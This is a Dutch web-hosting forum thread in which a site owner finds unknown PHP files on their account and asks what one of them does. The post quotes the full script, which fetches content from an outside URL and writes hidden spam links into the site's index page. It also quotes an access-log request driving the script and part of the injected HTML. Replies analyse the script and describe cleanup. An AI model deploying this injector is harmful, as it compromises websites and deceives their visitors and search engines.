php spying?

Status
Niet open voor verdere reacties.
R

Raimundo

Gebruiker
Lid geworden
5 jul 2002
Berichten
124
Mijn hosting provider maakte mij er op attent, dat een ip-adres voorkomend op een z.g. zwarte lijst tot mijn domein was doorgedrongen en daar mogelijk bestanden had geplaatst.
Het bleekt dat er 2 php bestandjes op mijn domein waren geplaatst terwijl ik überhaupt geen php gebruik.
Het ene bestandje bevatte alleen het commando "phpinfo", maar het andere was wat groter.

Volgens de logfile was dat bestand (01qcx.php) ook regelmatig aangesproken. Een voorbeeld:

[08/Jan/2010:07:43:02 +0100]
"GET /foto/01qcx.php?f=http://yourutils.com/upl/out/red.php HTTP/1.0" 404 - "-" "-"

Kan iemand uitleggen wat dat programmaatje (zie hieronder) doet of zou kunnen doen? Mijn provider (althans de helpdesk) stuurt mij het bos in

PHP: 
<?php
header('Content-type: text/html; charset=utf-8');
$t = "../";
$r = ".html";
if(!file_exists($t."index".$r)) $r = ".htm";
if(!file_exists($t."index".$r)) $r = ".shtml";
if(!file_exists($t."index".$r)) $r = ".phtml";
if(!file_exists($t."index".$r)) $r = ".php";

if($_GET['add']){
$read = html_entity_decode(implode('',file($t."index".$r)));

if(!ereg("<!--LINKS-LINKS-->",$read)){
	$fp = fopen($t."index".$r,"w");
	if(fwrite($fp,$read."\n<!--LINKS-LINKS-->")) print "Setuped...";
	fclose($fp);
} else print "Already....";

}

if($_GET['f']){
$f = file_get_contents($_GET['f']);

$read = html_entity_decode(implode('',file($t."index".$r)));
if(ereg("<!--LINKS-LINKS-->",$read)){
		$ex = explode("<!--LINKS-LINKS-->",$read);

		$fw = $ex[0]."<!--LINKS-LINKS-->".$f;

		$fp = fopen($t."index".$r,"w");
		if(fwrite($fp,$fw)) print "<h1>{OK!}</h1>";
		fclose($fp);
}

}
?>
 
Laatst bewerkt door een moderator:
dit scriptje kijkt welke file hij als index moet gebruiken index.php of index.html enz...

suc6
 
Hij probeert stukjes code in je pagina te verbergen vanaf een externe site; ws om spyware te installeren bij de bezoekers van je website.
 
raar hoe kan zo iemand dan zoon script op de server krijgen.
is de server dan niet goed beveiligd?
 
Nou weet ik niet wat de inhoud is van hxxp://yourutils DOT com/upl/out/red DOT php
(even onbruikbaar gemaakt)

Maar zoals ik het lees zoekt het scriptje uit welke pagina als index word gebruikt en zet daar een aantal regels bij in (<!--LINKS-LINKS--> en de inhoud van de eerdergenoemde link)
dus verwijder (of hermoem en verplaats het :)) en controleer alle Index.xxx en op je webhost

De phpinfo zal zijn geweest of jou server hiervoor gevoelig is.

Nu is de infectie mogelijk doormiddel van een fout van je host (server niet veilig genoeg)
Of het kan zijn dat jij een aantal scripts in je webpagina hebt die niet veilig zijn.
 
Thx
Die tip over index.xxx was wel goed.
Mijn hele index.html file was aangevuld met een hele serie links (170). Ik geef maar even een voorbeeldje:

"http://www.jusyou.co.uk/balance.php?cag=roberto-alomar">roberto alomar</a></li><li id=dva> <a href=

Alle links hebben betrekking op sites die mij totaal onbekend zijn. Er zit en ook geen enkele potentiële bezoeker bij die geïnteresseerd zou kunnen zijn in onze website.
De links worden vooraf gegaan met :

<!--LINKS-LINKS--><style>#dva{position: absolute;overflow: auto;height: 0;width: 0}</style><div id=dva><li id=dva> <a href=

Ik vermoed dat het gaat om links met informatie om bepaalde sites hoger in zoekmachines te krijgen. Dus b.v. bovenaan in Google bij bepaalde zoektermen.
Zeker weten doe ik het niet.

Uiteraard heb ik de oude/officiële index weer teruggezet.
Hoe de indringer op mijn omgeving bij mijn provider komt is onduidelijk. Daar zal de provider (Your Hosting) toch nog even op moeten antwoorden.
Ja, wachtwoorden zijn nu gewijzigd (waren overigens niet voor de hand liggend), alle php bestanden zijn verwijderd en de index file is teruggeplaatst, maar de oorzaak (binnendringen op een beveiligde omgeving) is daarmee niet opgelost.

Raimundo
 
Laatst bewerkt:
Ook bij yourhosting

Zelfde laken uit een pak hier bij yourhosting
Zelfde script aangetroffen op één van mijn sites.

Het script is aangemaakt op 02-01-2010 om 01:40
Op 07-01-2010 is door yourhosting het ftp-password gereset.

Het script plakt (append) via een request html links achter index bestanden indien aanwezig.

index.php
index.html
index.htm
en index.shtml

via f=http://www.yourutils.com/upl/out/r.php worden de links als het ware gefeed in het script en geschreven achter je index bestandje.

Ik denk dat het weinig te maken heeft met onveilig scripten omdat je geen eens php scripts gebruikt. Ik heb ook een request in de log gevonden naar httpd.php. Iets doet mij vermoeden dat er op servernivo iets niet in de haak was. Om een php-script uberhaupt iets te laten schrijven op een goed beveiligde server moet je via ftp toegang of ssh de rechten ook nog eens juist instellen.

Ik heb het script aangepast in de hoop op meer info, maar verder dan de request-uri en een ip adres uit duitsland kom ik ook niet.

Blijft altijd waardeloos dit soort ongein ...
 
Laatst bewerkt:
Dergelijke scripts kunnen ook via een (eigen) geïnfecteerde computer op je server 'geïnstalleerd' worden wanneer je FTP gebruikt. Maar een gat in de beveiliging van de server is waarschijnlijker.
 
JP Romijn zei:
Dergelijke scripts kunnen ook via een (eigen) geïnfecteerde computer op je server 'geïnstalleerd' worden wanneer je FTP gebruikt. Maar een gat in de beveiliging van de server is waarschijnlijker.
Klik om te vergroten...

Mij ook, aangezien ik linux gebruik om bestanden te uploaden. Tevens zat ik op 2 januari om 1:40 echt niet achter de pc.
 
Status
Niet open voor verdere reacties.
Steun Ons

Nieuwste berichten

Terug
Bovenaan Onderaan